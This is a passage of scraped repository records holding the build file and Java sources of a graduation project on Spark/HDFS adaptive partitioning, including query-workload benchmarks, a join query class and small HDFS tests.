break;\n }\n\n }\n}\n" }, { "alpha_fraction": 0.6263736486434937, "alphanum_fraction": 0.692307710647583, "avg_line_length": 28.1200008392334, "blob_id": "9ee2fa86c249a0c0fa7f6341579c9735a529898a", "content_id": "6dcbcf6a276ff199c725754c6e424c3c501cacd4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 728, "license_type": "no_license", "max_line_length": 68, "num_lines": 25, "path": "/build.gradle", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "group 'com.sy.GraduationProject'\nversion '1.0-SNAPSHOT'\n\napply plugin: 'java'\n\nsourceCompatibility = 1.8\n\nrepositories {\n mavenCentral()\n}\n\ndependencies {\n compile 'org.slf4j:slf4j-api:1.7.12'\n compile 'org.apache.hadoop:hadoop-common:2.6.0'\n compile 'org.apache.hadoop:hadoop-hdfs:2.6.0'\n compile 'org.apache.hadoop:hadoop-mapreduce-client-common:2.6.0'\n compile 'org.apache.spark:spark-core_2.11:1.6.0'\n compile 'org.apache.spark:spark-sql_2.11:1.6.0'\n compile 'com.databricks:spark-csv_2.11:1.3.0'\n compile 'org.apache.commons:commons-math3:3.5'\n compile 'org.apache.commons:commons-csv:1.2'\n compile 'junit:junit:4.12'\n //\n testCompile group: 'junit', name: 'junit', version: '4.12'\n}\n" }, { "alpha_fraction": 0.6622315645217896, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 23.620689392089844, "blob_id": "72542bd9ba5042b3549fb72832cd45ea136f4a4d", "content_id": "6a7e32e390597a74bac8bbde99895d5042eb3fb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4284, "license_type": "no_license", "max_line_length": 91, "num_lines": 174, "path": "/src/main/java/perf/benchmark/CMTWorkload.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package perf.benchmark;\n\nimport core.adapt.Predicate;\nimport core.adapt.Predicate.PREDTYPE;\nimport core.adapt.Query;\nimport core.adapt.spark.SparkQuery;\nimport core.common.globals.Globals;\nimport core.common.globals.TableInfo;\nimport core.utils.ConfUtils;\nimport core.utils.HDFSUtils;\nimport core.utils.TypeUtils;\nimport core.utils.TypeUtils.TYPE;\nimport org.apache.hadoop.fs.FileSystem;\n\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic class CMTWorkload {\n\tpublic ConfUtils cfg;\n\n\tpublic String schemaString;\n\n\tint numFields;\n\n\tint method;\n\n String tableName;\n\n TableInfo tableInfo;\n\n\tpublic void setUp() {\n\t\ttableName = \"cmt\";\n\n\t\tcfg = new ConfUtils(BenchmarkSettings.conf);\n\t\tFileSystem fs = HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n\n\t\t// Load table info.\n\t\tGlobals.loadTableInfo(tableName, cfg.getHDFS_WORKING_DIR(), fs);\n\t\ttableInfo = Globals.getTableInfo(tableName);\n\t\tassert tableInfo != null;\n\t}\n\n\tpublic Predicate getPredicate(String pred) {\n\t\tString[] parts = pred.split(\" \");\n\n\t\tint attrId = tableInfo.schema.getAttributeId(parts[0].trim());\n\t\t\n\t\tif (attrId == -1) {\n\t\t\tthrow new RuntimeException(\"Unknown attr: \" + parts[0].trim());\n\t\t}\n\t\t\n\t\tTYPE attrType = tableInfo.schema.getType(attrId);\n\t\tObject value = TypeUtils.deserializeValue(attrType, parts[2].trim().replaceAll(\"'\", \"\"));\n\t\tString predTypeStr = parts[1].trim();\n\t\tPREDTYPE predType;\n\t\tswitch (predTypeStr) {\n\t\tcase \">\":\n\t\t\tpredType = PREDTYPE.GT;\n\t\t\tbreak;\n\t\tcase \">=\":\n\t\t\tpredType = PREDTYPE.GEQ;\n\t\t\tbreak;\n\t\tcase \"<\":\n\t\t\tpredType = PREDTYPE.LT;\n\t\t\tbreak;\n\t\tcase \"<=\":\n\t\t\tpredType = 
PREDTYPE.LEQ;\n\t\t\tbreak;\n\t\tcase \"=\":\n\t\t\tpredType = PREDTYPE.EQ;\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tthrow new RuntimeException(\"Unknown predType \" + predTypeStr);\n\t\t}\n\n\t\tPredicate p = new Predicate(tableInfo, parts[0].trim(), attrType, value, predType);\n\t\treturn p;\n\t}\n\t\n\tpublic List<Query> generateWorkload() {\n\t\tbyte[] stringBytes = HDFSUtils.readFile(\n\t\t\t\tHDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME()),\n\t\t\t\t\"/user/mdindex/cmt_queries.log\");\n\t\tString queriesString = new String(stringBytes);\n\t\tString[] queries = queriesString.split(\"\\n\");\n\t\tList<Query> ret = new ArrayList<Query>();\n\t\tfor (int i=0; i<queries.length; i++) {\n\t\t\tString queryString = queries[i];\n\t\t\tString[] parts = queryString.split(\"\\\\|\");\n\t\t\tString[] predicates = parts[1].split(\";\");\n\t\t\tList<Predicate> queryPreds = new ArrayList<Predicate>();\n\t\t\tfor (int j=0; j<predicates.length; j++) {\n\t\t\t\tPredicate p = getPredicate(predicates[j]);\n\t\t\t\tList<Predicate> preds = p.getNormalizedPredicates();\n\t\t\t\tqueryPreds.addAll(preds);\n\t\t\t}\n\t\t\tPredicate[] predArray = queryPreds.toArray(new Predicate[queryPreds.size()]);\n\t\t\tret.add(new Query(tableName, predArray));\n\t\t}\n\n\t\treturn ret;\n\t}\n\n public void testWorkload() {\n\t\tlong start, end;\n\t\tSparkQuery sq = new SparkQuery(cfg);\n\t\tList<Query> queries = generateWorkload();\n\t\tfor (Query q: queries) {\n\t\t\tSystem.out.println(\"INFO: Query:\" + q.toString());\n\t\t}\n\t}\n\n\tpublic void runWorkload() {\n\t\tlong start, end;\n\t\tSparkQuery sq = new SparkQuery(cfg);\n\t\tList<Query> queries = generateWorkload();\n\t\tfor (Query q: queries) {\n\t\t\tSystem.out.println(\"INFO: Query:\" + q.toString());\n\t\t}\n\n\t\tfor (Query q : queries) {\n\t\t\tstart = System.currentTimeMillis();\n\t\t\tlong result = sq.createAdaptRDD(cfg.getHDFS_WORKING_DIR(),\n\t\t\t\t\tq).count();\n\t\t\tend = System.currentTimeMillis();\n\t\t\tSystem.out.println(\"RES: Time Taken: \" + (end - start) +\n\t\t\t\t\t\"; Result: \" + result);\n\t\t}\n\t}\n\n\tpublic void loadSettings(String[] args) {\n\t\tint counter = 0;\n\t\twhile (counter < args.length) {\n\t\t\tswitch (args[counter]) {\n\t\t\tcase \"--schema\":\n\t\t\t\tschemaString = args[counter + 1];\n\t\t\t\tcounter += 2;\n\t\t\t\tbreak;\n\t\t\tcase \"--numFields\":\n\t\t\t\tnumFields = Integer.parseInt(args[counter + 1]);\n\t\t\t\tcounter += 2;\n\t\t\t\tbreak;\n\t\t\tcase \"--method\":\n\t\t\t\tmethod = Integer.parseInt(args[counter + 1]);\n\t\t\t\tcounter += 2;\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\t// Something we don't use\n\t\t\t\tcounter += 2;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tBenchmarkSettings.loadSettings(args);\n\t\tBenchmarkSettings.printSettings();\n\n\t\tCMTWorkload t = new CMTWorkload();\n\t\tt.loadSettings(args);\n\t\tt.setUp();\n\n\t\tswitch (t.method) {\n\t\tcase 1:\n\t\t\tt.runWorkload();\n\t\t\tbreak;\n case 2:\n \tt.testWorkload();\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tbreak;\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.6093429327011108, "alphanum_fraction": 0.6160164475440979, "avg_line_length": 24.63157844543457, "blob_id": "362b793c4747c671e5b1d5c7d74874e819bcf070", "content_id": "fcdda2c97f27190fb361013bc0c294ee05dd64a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1948, "license_type": "no_license", "max_line_length": 79, "num_lines": 76, "path": "/src/main/java/core/adapt/JoinQuery.java", "repo_name": 
"qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.adapt;\n\n\nimport java.io.DataOutput;\nimport java.io.IOException;\nimport java.io.Serializable;\n\nimport core.adapt.Predicate;\nimport core.adapt.Query;\nimport org.apache.hadoop.io.Text;\n\nimport com.google.common.base.Joiner;\n\n/**\n * Created by ylu on 1/25/16.\n */\n\npublic class JoinQuery implements Serializable {\n private static final long serialVersionUID = 1L;\n\n private Predicate[] predicates;\n private String table;\n private int joinAttribute;\n\n public JoinQuery(String queryString) {\n String[] parts = queryString.split(\"\\\\|\");\n this.table = parts[0];\n this.joinAttribute = Integer.parseInt(parts[1]);\n if (parts.length > 2) {\n String predString = parts[2].trim();\n String[] predParts = predString.split(\";\");\n this.predicates = new Predicate[predParts.length];\n for (int i = 0; i < predParts.length; i++) {\n this.predicates[i] = new Predicate(predParts[i]);\n }\n } else {\n this.predicates = new Predicate[0];\n }\n }\n\n public JoinQuery(String table, int joinAttribute, Predicate[] predicates) {\n this.table = table;\n this.joinAttribute = joinAttribute;\n this.predicates = predicates;\n }\n\n public Predicate[] getPredicates() {\n return this.predicates;\n }\n\n public String getTable() {\n return this.table;\n }\n\n public int getJoinAttribute(){\n return this.joinAttribute;\n }\n\n public Query castToQuery(){\n return new Query(table, predicates);\n }\n\n public void write(DataOutput out) throws IOException {\n Text.writeString(out, toString());\n }\n\n\n\n @Override\n public String toString() {\n String stringPredicates = \"\";\n if (predicates.length != 0)\n stringPredicates = Joiner.on(\";\").join(predicates);\n return table + \"|\" + joinAttribute + \"|\" + stringPredicates;\n }\n}\n" }, { "alpha_fraction": 0.6791393756866455, "alphanum_fraction": 0.6941066384315491, "avg_line_length": 25.725000381469727, "blob_id": "362780ad7a4e4e14cece3a360c004abc1e4673e1", "content_id": "73dd53bbd5351f76201a95b2a468e20eee47d558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1069, "license_type": "no_license", "max_line_length": 100, "num_lines": 40, "path": "/src/test/java/core/common/index/RobustTreeTest.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.common.index;\n\nimport core.adapt.Predicate;\nimport core.adapt.Query;\nimport core.common.globals.Globals;\nimport core.common.globals.TableInfo;\nimport core.common.key.ParsedTupleList;\nimport core.utils.ConfUtils;\nimport core.utils.HDFSUtils;\nimport core.utils.TypeUtils;\nimport org.apache.hadoop.fs.FileSystem;\n\nimport java.util.*;\n\n/**\n * Created by ylu on 2/10/16.\n */\npublic class RobustTreeTest {\n public static void main(String[] args){\n\n\n\n ConfUtils cfg = new ConfUtils(\"/Users/ylu/Documents/workspace/mdindex/conf/ylu.properties\");\n FileSystem fs = HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n\n byte[] sampleBytes = HDFSUtils.readFile(fs, \"/index\");\n\n\n RobustTree rt = new RobustTree();\n rt.unmarshall(sampleBytes);\n\n\n TypeUtils.SimpleDate d3 = new TypeUtils.SimpleDate(1995,\n 4, 14);\n\n Predicate p = new Predicate(10, TypeUtils.TYPE.DATE, d3, Predicate.PREDTYPE.GT);\n List<RNode> rr = rt.getMatchingBuckets( new Predicate[]{p});\n System.out.println();\n }\n}\n" }, { "alpha_fraction": 0.5588613152503967, "alphanum_fraction": 0.5638912916183472, "avg_line_length": 32.371429443359375, 
"blob_id": "47446f736777073bccb7a7551c9fdf4bca759a8e", "content_id": "63e69029effa02308d439a6c99cb39a26154f72f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 9348, "license_type": "no_license", "max_line_length": 152, "num_lines": 280, "path": "/src/main/java/perf/benchmark/CMTJoinWorkload.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package perf.benchmark;\n\nimport core.adapt.JoinQuery;\nimport core.adapt.Predicate;\nimport core.adapt.spark.RangePartitioner;\nimport core.adapt.spark.join.SparkJoinQuery;\nimport core.common.globals.Schema;\nimport core.common.globals.TableInfo;\nimport core.utils.ConfUtils;\nimport core.utils.HDFSUtils;\nimport core.utils.RangePartitionerUtils;\nimport core.utils.TypeUtils;\nimport org.apache.commons.io.FilenameUtils;\nimport org.apache.hadoop.fs.FileStatus;\nimport org.apache.hadoop.fs.FileSystem;\nimport org.apache.hadoop.fs.Path;\nimport org.apache.hadoop.io.LongWritable;\nimport org.apache.hadoop.io.Text;\nimport org.apache.spark.Partitioner;\nimport org.apache.spark.api.java.JavaPairRDD;\nimport org.apache.spark.api.java.JavaRDD;\nimport scala.Tuple2;\n\nimport java.io.FileNotFoundException;\nimport java.io.IOException;\nimport java.util.ArrayList;\nimport java.util.Random;\n\n\npublic class CMTJoinWorkload {\n\n private ConfUtils cfg;\n\n private Schema schemaMH, schemaMHL, schemaSF;\n private String stringMH, stringMHL, stringSF;\n private String MH = \"mh\", MHL = \"mhl\", SF = \"sf\";\n private TableInfo tableMH, tableMHL, tableSF;\n\n private Predicate[] EmptyPredicates = {};\n\n\n private int method;\n\n private int numQueries;\n\n private Random rand;\n\n public void setUp() {\n cfg = new ConfUtils(BenchmarkSettings.conf);\n rand = new Random();\n\n // Making things more deterministic.\n rand.setSeed(0);\n\n tableMH = new TableInfo(MH, 0, '|', schemaMH);\n tableMHL = new TableInfo(MHL, 0, '|', schemaMHL);\n tableSF = new TableInfo(SF, 0, '|', schemaSF);\n }\n\n public void garbageCollect(){\n FileSystem fs = HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n\n tableMH.gc(cfg.getHDFS_WORKING_DIR(), fs);\n tableMHL.gc(cfg.getHDFS_WORKING_DIR(), fs);\n tableSF.gc(cfg.getHDFS_WORKING_DIR(), fs);\n }\n\n\n public void loadSettings(String[] args) {\n int counter = 0;\n while (counter < args.length) {\n switch (args[counter]) {\n case \"--schemaMH\":\n stringMH = args[counter + 1];\n schemaMH = Schema.createSchema(stringMH);\n counter += 2;\n break;\n case \"--schemaMHL\":\n stringMHL = args[counter + 1];\n schemaMHL = Schema.createSchema(stringMHL);\n counter += 2;\n break;\n case \"--schemaSF\":\n stringSF = args[counter + 1];\n schemaSF = Schema.createSchema(stringSF);\n counter += 2;\n break;\n case \"--method\":\n method = Integer.parseInt(args[counter + 1]);\n counter += 2;\n break;\n case \"--numQueries\":\n numQueries = Integer.parseInt(args[counter + 1]);\n counter += 2;\n break;\n default:\n // Something we don't use\n counter += 2;\n break;\n }\n }\n }\n\n public void cleanup(String path){\n FileSystem fs = HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n try {\n fs.delete(new Path(path), true);\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n\n\n public void postProcessing(String path, String tableName, Schema schema) {\n\n /* rename part-0000i to i and create an info file*/\n\n try {\n FileSystem fs = HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n String dest = path + \"/data\";\n\n // delete _SUCCESS\n\n 
fs.delete(new Path(dest + \"/_SUCCESS\"), false);\n FileStatus[] fileStatus = fs.listStatus(new Path(dest));\n\n for (int i = 0; i < fileStatus.length; i++) {\n String oldPath = fileStatus[i].getPath().toString();\n String baseName = FilenameUtils.getBaseName(oldPath);\n String dir = oldPath.substring(0, oldPath.length() - baseName.length());\n String newPath = dir + Integer.parseInt(baseName.substring(baseName.indexOf('-') + 1));\n\n fs.rename(new Path(oldPath), new Path(newPath));\n }\n\n\n /* write out a fake (TOTAL_NUM_TUPLES is 0, delimiter is set to '|') info to make HDFSPartition Happy*/\n\n TableInfo tableInfo = new TableInfo(tableName, 0, ';', schema);\n tableInfo.save(cfg.getHDFS_WORKING_DIR(), cfg.getHDFS_REPLICATION_FACTOR(), fs);\n\n\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n\n\n public Predicate getPredicate(Schema schema, String pred) {\n String[] parts = pred.split(\" \");\n int attrId = schema.getAttributeId(parts[0].trim());\n\n if (attrId == -1) {\n throw new RuntimeException(\"Unknown attr: \" + parts[0].trim());\n }\n\n TypeUtils.TYPE attrType = schema.getType(attrId);\n Object value = TypeUtils.deserializeValue(attrType, parts[2].trim().replaceAll(\"'\", \"\"));\n String predTypeStr = parts[1].trim();\n Predicate.PREDTYPE predType;\n switch (predTypeStr) {\n case \">\":\n predType = Predicate.PREDTYPE.GT;\n break;\n case \">=\":\n predType = Predicate.PREDTYPE.GEQ;\n break;\n case \"<\":\n predType = Predicate.PREDTYPE.LT;\n break;\n case \"<=\":\n predType = Predicate.PREDTYPE.LEQ;\n break;\n case \"=\":\n predType = Predicate.PREDTYPE.EQ;\n break;\n default:\n throw new RuntimeException(\"Unknown predType \" + predTypeStr);\n }\n\n Predicate p = new Predicate(attrId, attrType, value, predType);\n return p;\n }\n\n\n\n public ArrayList<ArrayList<JoinQuery>> generateWorkload() {\n byte[] stringBytes = HDFSUtils.readFile(\n HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME()),\n \"/user/yilu/cmt100000000/cmt_queries.log\");\n\n String queriesString = new String(stringBytes);\n String[] queries = queriesString.split(\"\\n\");\n ArrayList<ArrayList<JoinQuery>> ret = new ArrayList<ArrayList<JoinQuery>>();\n for (int i=0; i<queries.length; i++) {\n String query = queries[i];\n String[] predicates = query.split(\";\");\n ArrayList<Predicate> mhPreds = new ArrayList<Predicate>();\n ArrayList<Predicate> sfPreds = new ArrayList<Predicate>();\n\n ArrayList<JoinQuery> q = new ArrayList<JoinQuery>();\n\n for (int j=0; j<predicates.length; j++) {\n if(predicates[j].startsWith(MH)){\n Predicate p = getPredicate(schemaMH, predicates[j]);\n mhPreds.add(p);\n } else {\n Predicate p = getPredicate(schemaSF, predicates[j]);\n sfPreds.add(p);\n }\n }\n\n Predicate[] mhArray = mhPreds.toArray(new Predicate[mhPreds.size()]);\n Predicate[] sfArray = sfPreds.toArray(new Predicate[sfPreds.size()]);\n\n JoinQuery q_mh = new JoinQuery(MH, schemaMH.getAttributeId(\"mh_id\"), mhArray);\n JoinQuery q_sf = new JoinQuery(SF, schemaSF.getAttributeId(\"sf_id\"), sfArray);\n\n q.add(q_mh);\n q.add(q_sf);\n\n ret.add(q);\n }\n\n return ret;\n }\n\n\n // sf ⋈ (mhl ⋈ mh)\n public void runWorkload(){\n\n\n ArrayList<ArrayList<JoinQuery>> queries = generateWorkload();\n SparkJoinQuery sq = new SparkJoinQuery(cfg);\n int iters = 0;\n\n for (ArrayList<JoinQuery> q: queries) {\n\n JoinQuery q_mh = q.get(0);\n JoinQuery q_sf = q.get(1);\n JoinQuery q_mhl = new JoinQuery(MHL, schemaMHL.getAttributeId(\"mhl_mapmatch_history_id\"), 
EmptyPredicates);\n\n System.out.println(\"INFO: Query_MH:\" + q_mh.toString());\n System.out.println(\"INFO: Query_sf:\" + q_sf.toString());\n\n\n long start = System.currentTimeMillis();\n\n String stringMH_join_MHL = stringMH + \", \" + stringMHL;\n Schema schemaMH_join_MHL = Schema.createSchema(stringMH_join_MHL);\n\n JavaPairRDD<LongWritable, Text> mh_join_mhl_rdd = sq.createJoinRDD(MH, q_mh,MHL, q_mhl, schemaMH_join_MHL.getAttributeId(\"mhl_dataset_id\"));\n JavaPairRDD<LongWritable, Text> sf_rdd = sq.createScanRDD(SF, q_sf);\n JavaPairRDD<LongWritable, Tuple2<Text, Text>> rdd = mh_join_mhl_rdd.join(sf_rdd);\n long result = rdd.count();\n\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n }\n\n public static void main(String[] args) {\n\n BenchmarkSettings.loadSettings(args);\n BenchmarkSettings.printSettings();\n\n CMTJoinWorkload t = new CMTJoinWorkload();\n t.loadSettings(args);\n t.setUp();\n\n switch (t.method) {\n case 1:\n t.runWorkload();\n break;\n default:\n break;\n }\n }\n}\n" }, { "alpha_fraction": 0.5413975119590759, "alphanum_fraction": 0.5537286996841431, "avg_line_length": 21.11688232421875, "blob_id": "1a24932ce3143161209533d9bb0be45cf4dc4ce3", "content_id": "6be6ed7784525752759d33a8686b52a11c328630", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1703, "license_type": "no_license", "max_line_length": 55, "num_lines": 77, "path": "/src/test/java/core/util/ConcurrentAppendTest.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.util;\n\nimport org.apache.hadoop.conf.Configuration;\nimport org.apache.hadoop.fs.FSDataOutputStream;\nimport org.apache.hadoop.fs.FileSystem;\nimport org.apache.hadoop.fs.Path;\n\nimport java.io.IOException;\nimport java.io.PrintWriter;\nimport java.net.URI;\n\n/**\n * Created by ylu on 3/8/16.\n */\n\nclass HelloThread extends Thread {\n\n String content;\n int id;\n HelloThread(String c, int i){\n content = c;\n id = i;\n }\n public void run() {\n String uri = \"hdfs://localhost:9000/test.txt\";\n\n // instantiate a configuration class\n Configuration conf = new Configuration();\n //conf.setBoolean(\"dfs.support.append\", true);\n // get a HDFS filesystem instance\n FileSystem fs = null;\n try {\n fs = FileSystem.get(URI.create(uri), conf);\n } catch (IOException e) {\n e.printStackTrace();\n }\n\n\n FSDataOutputStream fsout = null;\n try {\n fsout = fs.append(new Path(uri));\n for(int i = 0; i <1000; i ++){\n //System.out.println(id);\n fsout.writeChars(content);\n }\n\n // wrap the outputstream with a writer\n\n //fs.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n\n\n}\n\npublic class ConcurrentAppendTest {\n\n\n public static void main(String[] args) {\n\n HelloThread t1 = new HelloThread(\"hello\\n\", 1);\n HelloThread t2 = new HelloThread(\"world\\n\", 2);\n t1.start();\n t2.start();\n\n try {\n t1.join();\n t2.join();\n } catch (InterruptedException e) {\n e.printStackTrace();\n }\n\n }\n\n}\n" }, { "alpha_fraction": 0.6774071455001831, "alphanum_fraction": 0.680060625076294, "avg_line_length": 27.989011764526367, "blob_id": "93e5dabef4b62231e0ea6e7f787612147dc619db", "content_id": "d07776281d8cafb68db98baf396da85e08bd74f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2638, "license_type": "no_license", "max_line_length": 101, "num_lines": 91, "path": 
"/src/main/java/core/adapt/spark/join/JoinAccessMethod.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.adapt.spark.join;\n\nimport core.adapt.AccessMethod.PartitionSplit;\nimport core.adapt.JoinQuery;\nimport core.adapt.Predicate;\nimport core.adapt.iterator.PartitionIterator;\n\nimport core.adapt.opt.JoinOptimizer;\nimport core.common.globals.Globals;\nimport core.common.globals.TableInfo;\nimport core.common.index.JoinRobustTree;\nimport core.common.key.RawIndexKey;\nimport core.utils.HDFSUtils;\n\n/**\n * Created by ylu on 1/27/16.\n */\n\n/**\n * This access method class considers filter access method over the distributed\n * dataset. The filter could be extracted as: - the selection predicate in\n * selection query - the sub-range filter (different for each node) in\n * join/aggregate query\n *\n * Currently, we support filtering only on one attribute at a time, i.e. we\n * expect the query processor to filter on the most selective attribute.\n *\n * Filter query: - can access only the local blocks on each node - scan over\n * partitioned portion - crack over non-partitioned portion\n *\n */\n\npublic class JoinAccessMethod {\n public JoinOptimizer opt;\n public RawIndexKey key;\n\n /**\n * Initialize hyper-partitioning data access.\n */\n public void init(SparkJoinQueryConf conf, int partition) {\n JoinQuery query = conf.getQuery();\n\n Globals.loadTableInfo(query.getTable(), conf.getWorkingDir(),\n HDFSUtils.getFSByHadoopHome(conf.getHadoopHome()));\n\n TableInfo tableInfo = Globals.getTableInfo(query.getTable());\n key = new RawIndexKey(tableInfo.delimiter);\n opt = new JoinOptimizer(conf);\n\n opt.loadIndex(tableInfo, partition);\n opt.loadQueries(tableInfo);\n }\n\n public JoinRobustTree getIndex() {\n return opt.getIndex();\n }\n\n public RawIndexKey getKey() {\n return key;\n }\n\n /**\n * This method returns whether or not a given partition qualifies for the\n * predicate.\n *\n * @param predicate\n * @return\n */\n public boolean isRelevant(String partitionid, Predicate predicate) {\n return true;\n }\n\n /**\n * This method is used to: 1. lookup the partition index for relevant\n * partitions 2. and, to create splits of partitions which could be assigned\n * to different node.\n *\n * The split thus produced must be: (a) equal in size (b) contain blocks\n * from the same sub-tree\n *\n * @return\n */\n public PartitionSplit[] getPartitionSplits(JoinQuery q, boolean justAccess, int indexPartition) {\n if (justAccess) {\n return opt.buildAccessPlan(q);\n } else {\n return opt.buildPlan(q, indexPartition);\n }\n }\n\n}\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 38, "blob_id": "3a069e953096f4e3521e8f357ed4cf6fd10f8f41", "content_id": "d28624ef57b2f6ee3a5f5ca0e28c5fc0706df9b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 40, "license_type": "no_license", "max_line_length": 38, "num_lines": 1, "path": "/settings.gradle", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "rootProject.name = 'GraduationProject'\n\n" } ]
12
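A small illustrative sketch, in Python, of consuming the test data that data/gen_simple.py in the record above generates; the path and the two-attribute (A, B) schema follow that script's docstring, and the snippet is an assumption-driven example rather than code from the repository:

# Read the pipe-delimited (A, B) pairs written by gen_simple.py.
with open('simple/simple.txt') as f:
    rows = [tuple(int(v) for v in line.split('|')) for line in f]

# The generator writes 1000 tuples, each attribute taking values from 1 to 1000.
print(len(rows), rows[:3])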
consokodev/socialapi
https://github.com/consokodev/socialapi
dc6afc0a55ab116407836dcad4c81e307c20a638
fabb763d534bf305a80597898b8ba163d75d6d10
656a3b0477f29f530b7c2510ba61f1f26a3203a0
refs/heads/master
2020-09-04T16:42:48.977837
2019-11-05T17:48:52
2019-11-05T17:48:52
218,351,162
0
0
null
2019-10-29T18:02:52
2019-10-29T18:03:34
2019-10-29T18:04:39
Python
[ { "alpha_fraction": 0.7208387851715088, "alphanum_fraction": 0.7208387851715088, "avg_line_length": 35.28571319580078, "blob_id": "9b96985fc67aaab5ebe87e45d272c5d72404a042", "content_id": "04218eee489ed4564865bfaca54979e14581387f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 785, "license_type": "no_license", "max_line_length": 69, "num_lines": 21, "path": "/api/tasks.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from celery.app import shared_task\nfrom celery.decorators import task\nfrom django.core.mail import EmailMultiAlternatives, send_mail\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\nfrom socialapi import celery_app\n\n@task(name=\"email_reset_pass\")\ndef email_reset_pass(email, reset_pass):\n html_content = render_to_string(\n 'mails/reset_pass.html',\n {'username': email, 'password': reset_pass}\n )\n text_content = strip_tags(html_content)\n subject = 'Восстановление аккаунта - plamber.com.ua'\n\n # send_mail(subject, \"message\", \"[email protected]\" ,[email])\n email = EmailMultiAlternatives(subject, text_content, to=[email])\n email.attach_alternative(html_content, 'text/html')\n email.send()\n\n" }, { "alpha_fraction": 0.40666666626930237, "alphanum_fraction": 0.6866666674613953, "avg_line_length": 17.75, "blob_id": "e608494191481e5999817797f51277b90d9b94d5", "content_id": "9c29a05282f084e28c38205911a9e4ec596d7986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 150, "license_type": "no_license", "max_line_length": 38, "num_lines": 8, "path": "/api/test.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "\n# time1 = \"2019-11-03 18:11:35.162187\"\n# time2 = \"2019-11-03 18:11:35.162187\n# \"\n\nfrom datetime import datetime\n\ndatetime.now()\nprint(datetime.now())" }, { "alpha_fraction": 0.530994176864624, "alphanum_fraction": 0.5836257338523865, "avg_line_length": 27.5, "blob_id": "fda3fd451305dc7bb8e1a996d8b87539b4c6774c", "content_id": "9d946e01b8b4fff76a239367c86d969d93b8fc1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "no_license", "max_line_length": 112, "num_lines": 30, "path": "/api/migrations/0002_auto_20191017_1726.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-17 17:26\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='fb_id',\n field=models.CharField(db_index=True, max_length=255, null=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 17, 17, 26, 28, 945035, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='user',\n name='email',\n field=models.EmailField(db_index=True, max_length=254, null=True, unique=True),\n ),\n ]\n" }, { "alpha_fraction": 0.5756056904792786, "alphanum_fraction": 0.5789473652839661, "avg_line_length": 35.846153259277344, "blob_id": "47a936092bf6c1630658dcf499764c98a59180e9", "content_id": "9ea514a743bde547e71395cf18dac7ff233ec3d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2394, 
